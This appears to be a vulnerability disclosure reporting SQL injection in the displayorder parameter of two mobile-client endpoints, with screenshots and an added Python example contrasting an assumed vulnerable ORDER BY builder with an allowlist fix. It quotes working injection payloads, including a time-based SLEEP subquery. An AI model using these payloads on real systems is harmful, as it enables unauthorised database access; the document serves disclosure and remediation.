Two interfaces used by the mobile client are vulnerable to SQL injection. The injected SELECT statements are not subject to any keyword filtering, so in theory arbitrary data can be retrieved.
0x01: http://**.**.**.**/android/jobs.php
=========================================================
Corresponding code:
Insufficient filtering of the displayorder parameter leads to SQL injection.
"displayorder":"rtime> limit 1 #desc" returns one row:
![1.png](../upload/201504/232223248c9506b0e6a8b0d6d574f6d5ad375789.png)
"displayorder":"rtime> limit 2 #desc" returns two rows:
![2.png](../upload/201504/23222335ec6580b9556fd172674cacacff01f14f.png)
Run it through SQLMAP:
0x02: http://**.**.**.**/android/news-list.php
=========================================================
Insufficient filtering of the displayorder parameter leads to SQL injection.
"displayorder":"id> limit 1 #desc" returns one row:
![3.png](../upload/201504/23223417c0b2e94f52248c6e70e13d6a8c5aadb7.png)
"displayorder": "id> abc#desc" returns a database error:
![4.png](../upload/201504/232237211e2c2ce1fb3d42d07dbb95b49ba68caf.png)
"displayorder": "id> AND (SELECT * FROM (SELECT(SLEEP(5)))MqQf)#desc" returns the data after a 5-second delay:
![5.png](../upload/201504/23224722ac2d1a2bab8aa8b2e2cb607985410960.png)
SQLMAP:
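How the displayorder value most likely reaches the query on both endpoints (jobs.php and news-list.php), and how to close the hole, as an added example: this is not the vulnerable site's code, which the report does not include. All three payloads above parse as valid or invalid MySQL exactly when the server splits displayorder on ">" into a column name and a sort direction and concatenates both into ORDER BY ("rtime> limit 1 #desc" becomes "ORDER BY rtime  limit 1 #desc", "id> abc#desc" becomes a syntax error, the SLEEP payload becomes "ORDER BY id AND (SELECT ...)"), so the example assumes that shape of code. The items table, its title column and the allowlist are constructed for the example; only rtime and id come from the report. The hardened builder maps the input onto an allowlist of columns and directions, since ORDER BY targets cannot be bound as prepared-statement parameters, and rejects every payload shown in the report.

```python
import sqlite3

# Columns the two endpoints legitimately sort by. rtime and id appear in the
# report; the allowlist itself and the table below are constructed here.
ALLOWED_COLUMNS = {"rtime", "id"}
ALLOWED_DIRECTIONS = {"asc", "desc"}
BASE_QUERY = "SELECT id, title, rtime FROM items"


def build_query_vulnerable(displayorder: str) -> str:
    """Assumed shape of the original code: 'column>direction' is split on '>'
    and both halves are concatenated straight into ORDER BY. Nothing is
    validated, so the direction half carries arbitrary SQL (LIMIT, a
    commented-out tail, or a boolean/time-based subquery as in the report).
    The string is returned, not executed: '#' comments and SLEEP() are
    MySQL syntax and would not run on sqlite."""
    column, _, direction = displayorder.partition(">")
    return f"{BASE_QUERY} ORDER BY {column} {direction}"


def build_query_safe(displayorder: str) -> str:
    """Hardened form: ORDER BY targets cannot be bound as parameters, so the
    only robust fix is to map the input onto an allowlist and reject the rest.
    The query text that reaches the database is then built only from
    constants the application itself defines."""
    column, sep, direction = displayorder.partition(">")
    column = column.strip()
    direction = direction.strip().lower()
    if not sep or column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected displayorder value: {displayorder!r}")
    return f"{BASE_QUERY} ORDER BY {column} {direction}"


def is_rejected(displayorder: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        build_query_safe(displayorder)
    except ValueError:
        return True
    return False


def run_safe(displayorder: str):
    """Executes the allowlisted query against a constructed in-memory table
    and returns the rows, so the accepted values can be seen to sort correctly."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT, rtime INTEGER)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?, ?)",
        [(1, "a", 300), (2, "b", 100), (3, "c", 200)],  # constructed sample rows
    )
    rows = conn.execute(build_query_safe(displayorder)).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    # The three payloads from the report, as they would be assembled by the
    # vulnerable builder, then checked against the hardened one.
    payloads = [
        "rtime> limit 1 #desc",
        "id> abc#desc",
        "id> AND (SELECT * FROM (SELECT(SLEEP(5)))MqQf)#desc",
    ]
    for p in payloads:
        print("vulnerable SQL :", build_query_vulnerable(p))
        print("hardened       :", "rejected" if is_rejected(p) else "accepted")
    print("legitimate     :", run_safe("rtime>desc"))
```

Note that the report's `#desc` tail is what makes the vulnerable builder's output well-formed for MySQL (everything after `#` is a comment) and what makes "id> abc#desc" fail: `ORDER BY id  abc` is a syntax error before the comment starts. The hardened builder never reaches the database with such input at all.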